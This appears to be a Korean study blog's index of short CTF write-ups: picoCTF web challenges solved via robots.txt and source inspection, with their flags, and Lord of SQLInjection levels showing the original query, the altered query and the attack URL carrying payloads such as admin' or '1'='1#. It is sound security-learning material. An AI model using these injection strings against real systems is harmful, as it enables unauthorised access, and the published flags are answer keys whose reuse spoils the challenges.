Study17 picoCTF: where are the robots(Web) Problemhint 1 : What part of the website could tell you where the creator doesn't want you to look?Solution 1. 문제 사이트 접속 2. flag가 숨겨져 보이지 않으므로 "robots.txt" 유추 3. "robots.txt"에서 "/477ce.html"라는 경로 확인. 4. "/477ce.html"에서 flag 발견. 5. flag: picoCTF{ca1cu1at1ng_Mach1n3s_477ce}결론robots.txt(검색 엔진이 운영중인 검색 로봇이 사이트 및 웹페이지를 수집할 수 있도록 허용하거나 제한하는 국제 표준 설정)에 접근하여 문제 해결 2025. 1. 22. picoCTF: Scavenger Hunt(Web) Problemhint 1 : You should have enough hints to find the files, don't run a brute forcer.Solution 1. 문제 링크 접속. 2. "How"를 보면 HTML. CSS, JS(JavaScript)로 사이트가 구성됨을 확인. 3. 개발자 도구 "Source"의 HTML 코드에서 첫 번째 flag 조각 발견. 4. CSS 코드에서 두 번째 flag 조각 발견. 5. JS 코그에서 세 번째 flag 조각 힌트 발견. 6. 힌트에서 "robots.txt" 유추 7. "robots.txt"에서 세 번째 flag 조각 발견 및 네 번째 flag 조각 힌트 발견. 8. 힌트를 통해 ".htaccess" 유추 [Apache2] .htaccess 설.. 2025. 1. 22. Lord of SQLInjection: goblin ProblemSolve기존 구문 → GET 방식, id = guest 고정select id from prob_goblin where id='guest' and no={$_GET[no]}변경 구문select id from prob_goblin where id='guest' and no=0 or no=2공격 구문https://los.rubiya.kr/chall/goblin_e5afb87a6716708e3af46a849517afdc.php?no=0 or no=1https://los.rubiya.kr/chall/goblin_e5afb87a6716708e3af46a849517afdc.php?no=0 or no=2 2025. 1. 21. Lord of SQLInjection: cobolt ProblemSolve기존 구문 → GET 방식, id = adminselect id from prob_cobolt where id='{$_GET[id]}' and pw=md5('{$_GET[pw]}')”변경 구문select id from prob_cobolt where id='admin' or '1'='1# and pw=md5('')”공격 구문https://los.rubiya.kr/chall/cobolt_b876ab5595253427d3bc34f1cd8f30db.php?id=admin' or '1'='1# 2025. 1. 21. Lord of SQLInjection: gremlin ProblemSolve기존 구문 → GET 방식select id from prob_gremlin where id='{$_GET[id]}' and pw='{$_GET[pw]}’ 변경 구문select id from prob_gremlin where id='admin' and pw='admin' or '1'='1#’ 공격 구문https://los.rubiya.kr/chall/gremlin_280c5552de8b681110e9287421b834fd.php?id=admin&pw=admin' or '1'='1 2025. 1. 21. picoCTF: Insp3ct0r(Web) Problemhint 1 : How do you inspect web code on a browser? hint 2 : There's 3 partsSolution 1. 문제 링크 접속 2. “How”를 살펴보면 HTML, CSS, JS(JavaScript)로 사이트가 구성됨을 알 수 있음 3. 개발자 도구에서 “Source”의 HTML 코드를 보면 첫 번째 flag 값 조각 발견 4. JS 코드를 보면 세 번째 flag 값 조각 발견 5. CSS 코드를 보면 번째 flag 값 조각 발견 6. flag : picoCTF{tru3_d3t3ct1ve_0r_ju5t_lucky?832b0699} 결론소스 코드 분석으로 문제 해결 2024. 11. 9. 이전 1 2 3 다음